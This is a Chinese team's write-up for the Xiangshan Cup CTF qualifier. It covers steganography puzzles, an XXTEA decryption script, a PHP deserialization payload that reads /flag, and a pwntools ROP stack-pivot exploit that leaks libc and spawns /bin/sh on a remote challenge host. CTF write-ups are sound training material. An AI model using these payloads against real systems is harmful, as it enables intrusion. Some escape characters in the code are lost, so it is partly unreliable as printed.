集训队Dozer队伍在中山市第三届香山杯网络安全大赛中高校组排名19,20,成功晋级线下决赛!
MISC
签到
base64+凯撒flag{we1c0m3_2_Ctf}
##
pintu
4703个图片 宽度固定高度不固定 有可能隐藏信息 根据tips
有可能是8进制转10进制那么高度就有可能包含8进制数据提取所有图片的8进制数据
6764407062406760407064406667406563407063406760406761406563407063407065406562407063407064407066406762406666407064407064406667407062406560407063406765407066407063406671406560406770406765407066406763407065407071406760406667407063406560406767406771407066406760407065407067406767406766406766406761407066406765407067406763407064406765406766406764407160407063406671406560406770406765407066406767407062406760407065407067407071406561406671406764407065406561407066406765407160406667406770406761407066406765407065406560407063406765407061406767406770407070406671406560407067406667407066406767407062406761407064406765407066406765406770406767406767406560407070406767407062406765406766406761406671406560407065407063406563407063406671406771406760407067407064406767407062406670407062406770407160407066407064406771406563406766406770406761407160406667406761407071407067406670407066406771407066407071407065406761406563406765407071406765407066407067407064406767407062406670407062406767407062406666406761406562407160406670406770406761407160406764406671406562407064406766407067406763407062407071407067406763407064406764407066406771407066407067407064406767407065407063406771406767407062406761407070406765406562406766406771406770406767406560407066406765406561406764407067406763407062407067406761406763407064406764407066406767407062407067407064406767407065407063407066406764407066406561406760406671407066406766406671406764407065406560407070406765407160406667406667406770407160406765407067406763407064406764407066406764407160407063406671406560406770406765407066406770407160407066407064406771407066406766406671406764407065406560407066406667407067406670407066406761407066406765407065406765407064406766406671406771406760407067407064406767407062406670406767406767407062406761407064406765407066406765407071406771407065406561407070406763407062406764407067406765406764406765406761406763407064406764407066406765407066407063406761406671406771406670407061406770406764406560407065407067407067406667406766406761406666406560407067407067407064406670406667406771407065406561406671407067407061407062407061406764407062406667407070406765407067406670406760406767407062406666406670406763406770406766406764406761407066407070406671407065407063407062407060406767406760406671407065407067406563407064407071406771406760406760406671406671407067406667407064406771407062406761407066407061407063406666407062406770406770406764406762406765407063406560406762406765407062406670407070406763407066407063407063406771407066406671407070406671406563406764407067406770406764406761407067406667407067406667406766406763406764406763407070406665407064406666407070406770407160407066407065407071407061407062407062406771407066406763407066406767406767406670406770406771407062406760407067406765407062406560406764406771406764406760407065406560407063406560406764406761406666406766406671406765407064406765407061406771406760406761407065406562407065406765406761406764406770406560406760406671407065406667406770406765407071406560406671407061407061406765406771406765407066406760407065406560407064406764407066406766406666407070406671407063407063406561406770406767407061407070407066406767406770407160407160406765407071406560407065407061407064406764407060406767407066407063407065406560407063406560407062406763406770407065407070406765406767406766407066406765406760406667407067406564406562406765406766406764406767407160407070406771406560406764407066406764406770406671406761406763406564406764407061406771406563406761406670406765407066406764407067406771407061406561407064406665406767407063406766406764407066406760406760407065406560407063406770406761406665407071407067406562407071406560407071406767406760406761407067407067407065407063406763406770406764406560407067407071406563406561406671406761406665406562407067407071407064406764407067406762406666406562406761407063407160406560406766406764406763406562407067406671406770406670407067406764407061406561407064406765407064406666407064406761406563406766406671406562406563406670406762406764406770407063407065407065406766407160407066406771406666406760406760406767406767406764407063406764406770406560407065406560406770407063407062406767406562407071407064407063406771406765407067406767406671407160406671407071406770406561406666406771407061406562407065406765407160406766406670406770406760406761407066407061406562407063406770406764406770406763407065407065406771406764407070406770407160406561406760406667406560406561406771406771406764406760407070406771406770406766407160406765406760406671407064407061406767407064406771406763406562406561407066406761407063406765406770406765406666406765407064406667407066407063407061406763406770407065407067406671406770406667406766406761406760406670407067406667407071407064406764406764407065406560406761406763407063406766406762406761407062406561407064406761406562407063407062406763406767407160407065406671407063406560407071406770407160406670407064406665406767406670407065406764407065407071406671406765407064406764407061406761407066406562406671407063406564406764407062406770407066406760407067406761406767406667407065406764406763406561407070406765406770406560406770406765407160406562406671406562406563406667406762406761406666406560406670406761407071407064406666406765406760406767406762407063406561406561407070406763407066406762406761406765406564406765406760406771406562407071407064406667407061406560406667406761407062407160406761406562407066407063407071406763406760406763407067406671406564406670407070406763406770407160406671407067406562406666407064406763406563407061407065406667406560406766407063406761406563406766406671407063407066407064406771406763406760406560406671406562407071406765407064406761406767406561407064406763407066406667406765406767406763407071407064406671406561406765406762406764406767407070407070406763407071406561407060406763406563406560406671406765406561407064407066406770406760407160406671407067407071406765406770406771406563406766406761407067406560407063406667406765407160407071406671406765406563407160407065406770407061407160407070406765406771406670407070406766406666406667407067406562406767406764407062406765407160406760407066406665407160406667406766406765406767406561406670407063407071407062407071406765406666407070406671406562406770406667406763406764406764407066407064406671406562406765406760406765407160406763407064406665406560406765406764406767407062406561407065407067407061407062407065406767406760407065407067406671406770406670407067406764406764406762406760406667406770406670406770406770406770406764406760406761406767407160407070406767406671407070407070406763407071407064406666406765406666406763407065406560407160406764407060406764406763407070407066406667407063406765407071406771406763406560406762407065406563406670406762406765406767406561407065407063407062406764407160406771406760406761407063406564406562406560406771406761406760406670407066407061407065406561406764406761406665407071407065407067406560407064407070406761407062406665407065407063406563406765406671406765406666407070406671406560406560406560406560406764407062407064407064406761406562406666407062406763407065406560407064406767406771406765406770406761406764406561407065406667407064407062407066406763407160407066406671407063407067406667406770406770407160407062407065407067407066407063406766406764407065406560406671406767406563406667406771406764406767406561407066406667406563407160407062406767407062407070406670406665406561407160407070406770406760406667407064406765407067406667406765406764407160406763407067406767406767406766406670406761407062406671407067407065407061407064407060406764407160407065407070407063406767406666407070406770406760407064407066407061407063406667406766406763406763407160407066406763406560407064406667406770407062406763406671406765406560406560406766406761407160406671407067406671407065407064406767406764407065406560407067406667407160406764407160406764407066406562406760407065406560407063406764406767407066406670406760407061407066407062407070406761406760406760406761407067407065406666407071406764406764407160406761406562406564406667407071406761407065407071406762407063407067406666407060406761407065406562406671407067407071407062407061406764406760407066406761406671406767406766406766406770407066407066407064407063406562406765406770406771407061406562406670406765407063407063406762406766406665407071406670406761407062406764407066406770406666406760407065407063406770406765406760406770407160406762406670406763406560406667406760406771407065406561407065406560406767406560406770406767406760407067407065406761407063406765407063406767406760406767406761407067406770406560407067406761406767406561407064406665406771406666407064406760406562406560406671406671407160406670406667406762406760407067406760407061407064406766406767406771406665407160407065
JRFTC5SFG5SU4STVHBTTCR2SKVSE2NKVIUYFCS2MOVFUWMLLGVKWITKLJZSE2NKVMRFUWY3EJU3VKZCNGVKU2SKQMNXE2WCVMRGTKVKNMM2XMRKLGE2US5SEOFWTMRDRNZVTO5LNGZCGYWDVOVYUG5KYKVWTMRDRMRBG4ZDNGZJE4TLWIRYWITJVOVWTMUSOMRGXK4LONM2VK3JWIRWGITJVMRWTMUSVJV3FEVLEJU2XKZCCNZKWITJVJZSE2NKVNZVTOVLEJU2VCWDVGVKUKTLEOFWTMRDMMRGTKVKYOU3XIRJWKJKGITJVKVSGEODQNJ2UWWCLGB2WWTDCOU3EWQRQJRCXKWDFMRBDINLJGVXEUSRPMFEUW5TYOFFEEWCTORGVQSBRNNJHKS2HKRDXIVSSOVEXE5JWNJGWCWCLIJIXATBXNZVUYQRROVIVMMDNORFWKR2JOJFU2S2JGBLEKTKQOFGU4UKGJN2FEUCNKY2EQQKOKVFU2TJVLBXESS3NMQXVMNZZKY2UQTJPMVSU2S2RINUXKMLVKFCW64KLJMZXO2JVJNEGI6JQO5GDKVJWOQ3TAMSLJVFFU2SNGAYW4Y2YMFGWWUSINJ2WY53EGA4WYTJWHB4GSZ2LJI4WENDWJQ3TKTBTG5LE45DHJNSUULZVOBFFMMJSJN2U2NSRM4YTSOKWMEZEYN3BOQ4UKZLDNFGVQ4SNJNIUUOJXNZ3FC23OOJFXONLZKFETQMTOI43VGSKNKBKTCVSQINUWENCLGFDWCYTJJU2GISLHGR3TG4SRIMZUES2YNZDTAMDUJUYEKTJQGV4ES6JRNVFWGMCUJI3XKN2NKZ4E45CHGB2DGYTBKFMHS33XIVHGK6KFO4YTCQ2CGRZG4VSYIFIWE6DXINZEW4BTI5QUC2LSG5LESVTOIF2E4YKTGM3TIVCKMIYTE3KHJMXXIY3PI52EK3TVNFZEWYKNO5LGW2SCKZYEK5ZUNQZXKODXLBCW4MJRKZFVAZCLKM3DSYRYKBXE4NCIJJVTE4KFKZITA2KJMR3UWQRUMFUWENDWJJHFCNDNNNJFGMZXMEXXIYTBKBIU2ZJPJIXVCSKYOI2HU5DHKM3USRJZOFGS642OGFDVQU3JGAYUW2TXGRAUS5KEKBXE2222JRTTG4BRIU2TMOKNGJ3UCTRVIZVESWCNNZRUWVSLJU2EM5COJM3VC5ZRMRXDA3ZXNFCTKWCKJZIWMMLDGREWUQTPJZUXSMBXNFTVQSCLIIZVI2TCNRIEK22LGZEWEUTMJU2WCZJZJV4FU2SJMVDFQVRXGFFGWUBYJJZG46CYGUYHSWBPGU4EWYRQJFVGEMLLNVVTS4KNOQ4DKSSHLAYDGRJVNBFUSNKFNZHDI2CFOU3U2M2NMFWUGSKSMFMGWN2WGM3TAOBTF42EEZDCHFWFQTLMOAZU
根据题目给的黑白图片 隐藏了二进制消息 取每张图片的rgb值 转换成二进制数据
from PIL import Image
import os
from libnum import n2s
b = ''
d = ''
tupian = './pintu'
for i in range(1, 4704):
image_path = os.path.join(tupian, f'{i}.png')
image = Image.open(image_path)
pixel = image.getpixel((0, 0))
d += chr(int(str(image.height), 8))
if pixel == (255, 255, 255): #白色1
b += '1'
else: #黑色0
b += '0'
b = b.zfill((len(bin_data) + 1) * 8 // 8)
flag = n2s(int(b, 2)).decode()
print(flag)
flag看到666c是不是特别兴奋,很可惜flag并不在这。(狗头保命),既然走到了这里,那我也给一个通关的关键信息拿去吧,去找到真正的flag吧:sUvcu5rgSeAmJQCfdXtEMKIB91Lj3niOo4hyV0b/2azpx8HqZP6wk7GNlTFYDR+W 哎,对了。拿走之前看一看我精心挑选的笑话吧:猎人打猎,朝狐狸开枪,“砰”地一声枪响之后猎人死了。狐狸叉着腰,冷笑一声:
“没想到吧,我是反射弧。”好不好笑, 有没有感觉一哆嗦,大脑更清晰了。ฅ՞•ﻌ•՞ ต
替换base64字典为sUvcu5rgSeAmJQCfdXtEMKIB91Lj3niOo4hyV0b/2azpx8HqZP6wk7GNlTFYDR+W
导出 修复png 
flag{4b6c1737-27e5-41c4-95e3-f70ad196063e}
REVERSE
URL从哪儿来
从样本中提取外联程序,直接下断点运行到TempFileName,查看地址为C:Users86131AppDataLocalTempou.489B.tmp
找到之后直接放入ida
调试代码,发现解密过程中有一处变量可疑,跟踪进入内存
dump下来解base
hello_py
反编译查看apk,在主函数看到了加载模块函数加载到了一个hello模块。根据资料查到chaquopy
chaquopy:实现python和Android交互的SDK找到assets里面就是chaquopy框架,.py文件被包装在子目录下的app.imy里,直接解压即可得到py文件
查看py文件,发现是一个XXTEA加密代码,而且密文和密钥都有,直接解密即可
解密脚本
#include <stdio.h>
#include <stdint.h>
#define DELTA 0x9e3779b9
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))
void btea(uint32_t* v, int n, uint32_t const key[4])
{
uint32_t y, z, sum;
unsigned p, rounds, e;
//加密
if (n > 1)
{
rounds = 6 + 52 / n;
sum = 0;
z = v[n - 1];
do
{
sum += DELTA;
e = (sum >> 2) & 3;
for (p = 0; p < n - 1; p++)
{
y = v[p + 1];
z = v[p] += MX;
}
y = v[0];
z = v[n - 1] += MX;
} while (--rounds);
}
//解密
else if (n < -1)
{
n = -n;
rounds = 6 + 52 / n;
sum = rounds * DELTA;
y = v[0];
do
{
e = (sum >> 2) & 3;
for (p = n - 1; p > 0; p--)
{
z = v[p - 1];
y = v[p] -= MX;
}
z = v[n - 1];
y = v[0] -= MX;
sum -= DELTA;
} while (--rounds);
}
}
int main()
{
uint32_t v[9] = { 689085350, 626885696, 1894439255, 1204672445, 1869189675, 475967424, 1932042439, 1280104741, 2808893494 };
uint32_t const k[4] = { 12345678, 12398712, 91283904, 12378192 };
//n的绝对值表示v的长度,取正表示加密,取负表示解密
int n = sizeof(v) / sizeof(uint32_t);
btea(v, -n, k);
for (int i = 0; i < n; i++)
{
for (int j = 0; j < sizeof(uint32_t) / sizeof(uint8_t); j++)
{
printf("0x%x, ", (v[i] >> (j * 8)) & 0xFF);
}
}
printf("n");
return 0;
}
//0x63, 0x31, 0x66, 0x38, 0x61, 0x63, 0x65, 0x36, 0x2d, 0x34, 0x62, 0x34, 0x36, 0x2d, 0x34, 0x39, 0x33, 0x31, 0x2d, 0x62, 0x32, 0x35, 0x62, 0x2d, 0x61, 0x31, 0x30, 0x31, 0x30, 0x61, 0x38, 0x39, 0x63, 0x35, 0x39, 0x32
arr = [0x63, 0x31, 0x66, 0x38, 0x61, 0x63, 0x65, 0x36, 0x2d, 0x34, 0x62, 0x34, 0x36, 0x2d, 0x34, 0x39, 0x33, 0x31, 0x2d, 0x62, 0x32, 0x35, 0x62, 0x2d, 0x61, 0x31, 0x30, 0x31, 0x30, 0x61, 0x38, 0x39, 0x63, 0x35, 0x39, 0x32,]
flag = ""
for i in range(len(arr)):
flag += chr(arr[i])
print("flag{"+flag+"}")
flag{c1f8ace6-4b46-4931-b25b-a1010a89c592}
WEB
PHP_unserialize_pro
考察了很简单的反序列化php代码如下
<?php
class Welcome{
public $name;
public $arg;
}
class G00d{
public $shell;
public $cmd;
}
class H4ck3r{
public $func;
}
$a=new Welcome();
$b=new G00d();
$c=new H4ck3r();
$a->name='A_G00d_H4ck3r';
$a->arg=$c;
$c->func=$b;
$b->shell='strtolower';
$b->cmd='show_source(chr(47).chr(102).chr(49).chr(97).chr(103));';
echo serialize($a);
?>
最后运行一下,传入/?data=O:7:"Welcome":2:{s:4:"name";s:13:"A_G00d_H4ck3r";s:3:"arg";O:6:"H4ck3r":1:{s:4:"func";O:4:"G00d":2:{s:5:"shell";s:10:"strtolower";s:3:"cmd";s:55:"show_source(chr(47).chr(102).chr(49).chr(97).chr(103));";}}}
即可获取flag
PWN
Move
这个题就是一个简单的栈迁移,只是本地的libc和远程的不同,本地是2.26,远程是2.27。
IDA
sskd是bss段上的,意思是我们可以在bss上构造rop链,然后通过栈迁移到这
我们要写4字节内容来绕后判断,这里有个强转把字节转成整型判断,所以我们可以输入0x12345678进if然后通过栈溢出迁移到bss段
EXP
from pwn import*
#p=process('./pwn')
p=remote('101.201.35.76',29720)
elf=ELF('./pwn')
libc=ELF('./libc6_2.27-3ubuntu1.5_amd64.so')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
context.clear(arch='amd64', os='linux', log_level='debug')
rdi=0x0000000000401353
bss=0x4050A0-0x8
leave_ret=0x40124B
ret=0x000000000040101a
payload=p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(0x401268)
p.sendafter(b"lets travel again!n",payload)
p.sendafter(b"number",p32(0x12345678))
payload1=b'a'*0x30+p64(bss)+p64(leave_ret)
#gdb.attach(p)
p.sendafter(b"TaiCooLa",payload1)
puts_addr=u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))
libc_base=puts_addr-libc.sym['puts']
system = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
print("base=",hex(libc_base))
print("system=",hex(system))
payload=p64(rdi)+p64(bin_sh)+p64(system)
p.sendafter(b"lets travel again!n",payload)
p.interactive()
原文始发于微信公众号(瞌睡虫小K):【竞赛】金陵科技学院-Dozer-香山杯初赛wp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论